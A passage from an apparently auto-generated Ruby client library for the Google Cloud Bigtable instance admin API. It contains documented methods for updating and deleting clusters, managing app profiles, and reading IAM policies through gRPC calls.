# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_cluster(name: nil, location: nil, serve_nodes: nil, cluster_config: nil, default_storage_type: nil, encryption_config: nil)
# Pass arguments to `update_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The unique name of the cluster. Values are of the form
# `projects/{project}/instances/{instance}/clusters/[a-z][-a-z0-9]*`.
# @param location [::String]
# Immutable. The location where this cluster's nodes and storage reside. For best
# performance, clients should be located as close as possible to this
# cluster. Currently only zones are supported, so values should be of the
# form `projects/{project}/locations/{zone}`.
# @param serve_nodes [::Integer]
# The number of nodes allocated to this cluster. More nodes enable higher
# throughput and more consistent performance.
# @param cluster_config [::Google::Cloud::Bigtable::Admin::V2::Cluster::ClusterConfig, ::Hash]
# Configuration for this cluster.
# @param default_storage_type [::Google::Cloud::Bigtable::Admin::V2::StorageType]
# Immutable. The type of storage used by this cluster to serve its
# parent instance's tables, unless explicitly overridden.
# @param encryption_config [::Google::Cloud::Bigtable::Admin::V2::Cluster::EncryptionConfig, ::Hash]
# Immutable. The encryption configuration for CMEK-protected clusters.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::Cluster.new
#
# # Call the update_cluster method.
# result = client.update_cluster request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def update_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::Cluster
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.update_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.update_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.update_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :update_cluster, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Partially updates a cluster within a project. This method is the preferred
# way to update a Cluster.
#
# To enable and update autoscaling, set
# cluster_config.cluster_autoscaling_config. When autoscaling is enabled,
# serve_nodes is treated as an OUTPUT_ONLY field, meaning that updates to it
# are ignored. Note that an update cannot simultaneously set serve_nodes to
# non-zero and cluster_config.cluster_autoscaling_config to non-empty, and
# also specify both in the update_mask.
#
# To disable autoscaling, clear cluster_config.cluster_autoscaling_config,
# and explicitly set a serve_node count via the update_mask.
#
# @overload partial_update_cluster(request, options = nil)
# Pass arguments to `partial_update_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload partial_update_cluster(cluster: nil, update_mask: nil)
# Pass arguments to `partial_update_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param cluster [::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash]
# Required. The Cluster which contains the partial updates to be applied, subject to
# the update_mask.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. The subset of Cluster fields which should be replaced.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest.new
#
# # Call the partial_update_cluster method.
# result = client.partial_update_cluster request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def partial_update_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::PartialUpdateClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.partial_update_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.cluster&.name
header_params["cluster.name"] = request.cluster.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.partial_update_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.partial_update_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :partial_update_cluster, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes a cluster from an instance.
#
# @overload delete_cluster(request, options = nil)
# Pass arguments to `delete_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_cluster(name: nil)
# Pass arguments to `delete_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the cluster to be deleted. Values are of the form
# `projects/{project}/instances/{instance}/clusters/{cluster}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest.new
#
# # Call the delete_cluster method.
# result = client.delete_cluster request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def delete_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::DeleteClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.delete_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :delete_cluster, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Creates an app profile within an instance.
#
# @overload create_app_profile(request, options = nil)
# Pass arguments to `create_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_app_profile(parent: nil, app_profile_id: nil, app_profile: nil, ignore_warnings: nil)
# Pass arguments to `create_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance in which to create the new app profile.
# Values are of the form
# `projects/{project}/instances/{instance}`.
# @param app_profile_id [::String]
# Required. The ID to be used when referring to the new app profile within its
# instance, e.g., just `myprofile` rather than
# `projects/myproject/instances/myinstance/appProfiles/myprofile`.
# @param app_profile [::Google::Cloud::Bigtable::Admin::V2::AppProfile, ::Hash]
# Required. The app profile to be created.
# Fields marked `OutputOnly` will be ignored.
# @param ignore_warnings [::Boolean]
# If true, ignore safety checks when creating the app profile.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest.new
#
# # Call the create_app_profile method.
# result = client.create_app_profile request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::AppProfile.
# p result
#
def create_app_profile request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_app_profile.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_app_profile.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_app_profile.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :create_app_profile, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets information about an app profile.
#
# @overload get_app_profile(request, options = nil)
# Pass arguments to `get_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_app_profile(name: nil)
# Pass arguments to `get_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the requested app profile. Values are of the form
# `projects/{project}/instances/{instance}/appProfiles/{app_profile}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest.new
#
# # Call the get_app_profile method.
# result = client.get_app_profile request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::AppProfile.
# p result
#
def get_app_profile request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_app_profile.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_app_profile.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_app_profile.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :get_app_profile, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists information about app profiles in an instance.
#
# @overload list_app_profiles(request, options = nil)
# Pass arguments to `list_app_profiles` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_app_profiles(parent: nil, page_size: nil, page_token: nil)
# Pass arguments to `list_app_profiles` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance for which a list of app profiles is
# requested. Values are of the form
# `projects/{project}/instances/{instance}`.
# Use `{instance} = '-'` to list AppProfiles for all Instances in a project,
# e.g., `projects/myproject/instances/-`.
# @param page_size [::Integer]
# Maximum number of results per page.
#
# A page_size of zero lets the server choose the number of items to return.
# A page_size which is strictly positive will return at most that many items.
# A negative page_size will cause an error.
#
# Following the first request, subsequent paginated calls are not required
# to pass a page_size. If a page_size is set in subsequent calls, it must
# match the page_size given in the first request.
# @param page_token [::String]
# The value of `next_page_token` returned by a previous call.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::AppProfile>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::AppProfile>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest.new
#
# # Call the list_app_profiles method.
# result = client.list_app_profiles request
#
# # The returned object is of type Gapic::PagedEnumerable. You can
# # iterate over all elements by calling #each, and the enumerable
# # will lazily make API calls to fetch subsequent pages. Other
# # methods are also available for managing paging directly.
# result.each do |response|
# # Each element is of type ::Google::Cloud::Bigtable::Admin::V2::AppProfile.
# p response
# end
#
def list_app_profiles request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_app_profiles.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_app_profiles.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_app_profiles.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :list_app_profiles, request, options: options do |response, operation|
response = ::Gapic::PagedEnumerable.new @bigtable_instance_admin_stub, :list_app_profiles, request, response, operation, options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates an app profile within an instance.
#
# @overload update_app_profile(request, options = nil)
# Pass arguments to `update_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_app_profile(app_profile: nil, update_mask: nil, ignore_warnings: nil)
# Pass arguments to `update_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param app_profile [::Google::Cloud::Bigtable::Admin::V2::AppProfile, ::Hash]
# Required. The app profile which will (partially) replace the current value.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. The subset of app profile fields which should be replaced.
# If unset, all fields will be replaced.
# @param ignore_warnings [::Boolean]
# If true, ignore safety checks when updating the app profile.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest.new
#
# # Call the update_app_profile method.
# result = client.update_app_profile request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def update_app_profile request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.update_app_profile.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.app_profile&.name
header_params["app_profile.name"] = request.app_profile.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.update_app_profile.timeout,
metadata: metadata,
retry_policy: @config.rpcs.update_app_profile.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :update_app_profile, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes an app profile from an instance.
#
# @overload delete_app_profile(request, options = nil)
# Pass arguments to `delete_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_app_profile(name: nil, ignore_warnings: nil)
# Pass arguments to `delete_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the app profile to be deleted. Values are of the form
# `projects/{project}/instances/{instance}/appProfiles/{app_profile}`.
# @param ignore_warnings [::Boolean]
# Required. If true, ignore safety checks when deleting the app profile.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest.new
#
# # Call the delete_app_profile method.
# result = client.delete_app_profile request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def delete_app_profile request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_app_profile.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.delete_app_profile.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_app_profile.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :delete_app_profile, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets the access control policy for an instance resource. Returns an empty
# policy if an instance exists but does not have a policy set.
#
# @overload get_iam_policy(request, options = nil)
# Pass arguments to `get_iam_policy` via a request object, either of type
# {::Google::Iam::V1::GetIamPolicyRequest} or an equivalent Hash.
#
# @param request [::Google::Iam::V1::GetIamPolicyRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_iam_policy(resource: nil, options: nil)
# Pass arguments to `get_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource [::String]
# REQUIRED: The resource for which the policy is being requested.
# See the operation documentation for the appropriate value for this field.
# @param options [::Google::Iam::V1::GetPolicyOptions, ::Hash]
# OPTIONAL: A `GetPolicyOptions` object for specifying options to
# `GetIamPolicy`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Iam::V1::Policy]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Iam::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Iam::V1::GetIamPolicyRequest.new
#
# # Call the get_iam_policy method.
# result = client.get_iam_policy request
#
# # The returned object is of type Google::Iam::V1::Policy.
# p result
#
def get_iam_policy request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::GetIamPolicyRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_iam_policy.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.resource
header_params["resource"] = request.resource
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_iam_policy.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_iam_policy.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :get_iam_policy, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Sets the access control policy on an instance resource. Replaces any
# existing policy.
#
# @overload set_iam_policy(request, options = nil)
# Pass arguments to `set_iam_policy` via a request object, either of type
# {::Google::Iam::V1::SetIamPolicyRequest} or an equivalent Hash.
#
# @param request [::Google::Iam::V1::SetIamPolicyRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload set_iam_policy(resource: nil, policy: nil, update_mask: nil)
